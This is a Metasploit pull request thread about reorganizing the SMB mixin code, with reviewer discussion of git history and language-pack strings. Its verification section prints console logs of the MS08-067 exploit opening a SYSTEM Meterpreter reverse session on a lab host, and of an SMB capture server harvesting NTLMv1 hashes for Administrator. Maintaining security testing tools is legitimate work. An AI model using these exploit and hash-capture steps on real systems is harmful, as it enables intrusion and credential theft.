### PR TITLE
Reorganize SMB mixins

### PR DESCRIPTION
**Pull request by jvazquez-r7**
While reviewing #3074 I'm noticing the SMB namespaces is a little bit unorganized. Even when I know it's hard to follow ruby conventions I'm trying to reorganize it a little bit better with the hope it's easier to add SMB related code/mixins.
## Verification

SMB is really important code, so please, feel free to eyeball, discuss and test as much modules as you want. I don't want to break SMB code :P
- [x] Travis should be green
- [x] Test as much SMB::Client modules as you want. Every module should work as before:

```
> use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set rhost 172.16.158.10
rhost => 172.16.158.10
msf exploit(ms08_067_netapi) > rexploit
[*] Reloading module...

[*] Started reverse handler on 172.16.158.1:4444
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] Selected Target: Windows XP SP3 English (AlwaysOn NX)
[*] Attempting to trigger the vulnerability...
[*] Sending stage (770048 bytes) to 172.16.158.10
[*] Meterpreter session 1 opened (172.16.158.1:4444 -> 172.16.158.10:1438) at 2015-02-13 17:38:52 -0600

meterpreter > getuid
eServer username: NT AUTHORITY\SYSTEM
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 172.16.158.10 - Meterpreter session 1 closed.  Reason: User exit
```
- [x] Test as much SMB::Server modules as you want. Every module should work as before:

```
msf auxiliary(smb) > set srvhost 172.16.158.1
srvhost => 172.16.158.1
msf auxiliary(smb) > exploit
[*] Auxiliary module execution completed
msf auxiliary(smb) >
[*] Server started.
[*] SMB Capture - Empty hash captured from 172.16.158.10:1432 - 172.16.158.10 captured, ignoring ...
[*] SMB Captured - 2015-02-13 17:38:13 -0600
NTLMv1 Response Captured from 172.16.158.10:1432 - 172.16.158.10
USER:Administrator DOMAIN:SMALL OS:Windows 2002 Service Pack 3 2600 LM:Windows 2002 5.1
LMHASH:b5e0b34cf7ff7d8c9a29652ff53d190d2f85252cc731bb25
NTHASH:3a41436175532fcdc366365c2aa213513b622afe35bc0c08
```

### CODE REVIEW

File: lib/msf/core/exploit/smb/client.rb [hunk 1]
```diff
@@ -0,0 +1,636 @@
...
+            ],
+          'Turkish' =>
+            [
+              "\x59\x00\x61\x00\x7a\x00\x31\x01\x63\x00\x31\x01\x6c\x00\x61\x00\x72\x00"
+            ],
+          'Japanese' =>
+            [
+              "\xea\x30\xe2\x30\xfc\x30\xc8\x30\x20\x00\xd7\x30\xea\x30\xf3\x30\xbf\x30"
+            ],
+          'Chinese - Traditional' =>
```
Comment (wchen-r7) [inline lib/msf/core/exploit/smb/client.rb]: Where is Simplified Chinese?

And what's the difference between this "Traditional Chinese" vs the one in Taiwan?

**Comment by Meatballs1** [comment]
There a number of moved files which have been recognised as a delete and add rather than a move function. This trashes the history of the file e.g.:

https://github.com/jvazquez-r7/metasploit-framework/commits/reorganize_smb/lib/msf/core/exploit/smb/client.rb

**Comment by kernelsmith** [comment]
Git mv instead of move should take care of it, after its reverted of course

File: lib/msf/core/exploit/smb/client.rb (hunk 1 above)
Comment (jvazquez-r7) [inline lib/msf/core/exploit/smb/client.rb]: @wchen-r7, honestly, no idea. I have not changed this code. It's as is in master.

**Comment by jvazquez-r7** [comment]
@Meatballs1, @kernelsmith I used ```git mv``` indeed:

https://github.com/jvazquez-r7/metasploit-framework/commit/ccabf305311beca0432b96a18fcc7bd6c3d086c0
https://github.com/jvazquez-r7/metasploit-framework/commit/f1ab7ed34367f42b7502c11ec18f11fb6bef1682
https://github.com/jvazquez-r7/metasploit-framework/commit/df1daff67396ad895af0d6a0f9be9b0fd24fb17b

File: lib/msf/core/exploit/smb/client.rb (hunk 1 above)
Comment (wchen-r7) [inline lib/msf/core/exploit/smb/client.rb]: It's awright, I don't think this is a big deal anyway.

**Comment by jvazquez-r7** [comment]
@Meatballs1 @kernelsmith indeed if you do ```git log --follow lib/msf/core/exploit/smb/client.rb``` from this branch the full file history is shown, but github only shows the history after the ```git mv``` :\ I'm not aware just now if there is a more "github compliant" way to ```git mv``` a file :\

**Comment by kernelsmith** [comment]
es verdad.  I think those commits must pre-date your changes!

**Comment by Meatballs1** [comment]
Need a git ninja for clarification :D

**Comment by bcook-r7** [comment]
I could be wrong, but I think this is the way git is designed to work.

If you want it to work without --follow, you'd need to rewrite the old history so it looks like the file was already in the right place from the beginning. I'm going to guess that would would be sort of disruptive here :) Git blame works fine though. Darn you Tab Assassin!

This foot-eating guy has more answers: http://git.661346.n2.nabble.com/log-option-quot-follow-quot-not-the-default-for-a-single-file-td7043949.html - personally, I just have an alias.

**Comment by kernelsmith** [comment]
Lol, foot-eating guy...and sure enough...

**Comment by bcook-r7** [comment]
this has happened before as well - see 'git log lib/msf/core/exploit/smb'  - also see how it globs :)

**Comment by bcook-r7** [comment]
Looked fine to me. Thanks, and good luck on the next steps!

File: lib/msf/core/exploit/smb/client.rb (hunk 1 above)
Comment (hmoore-r7) [inline lib/msf/core/exploit/smb/client.rb]: These align with what Microsoft called their respective language packs (no idea what the differences are, they should probably be renamed, so long as the targets in use are renamed to match).

**Pull request merged**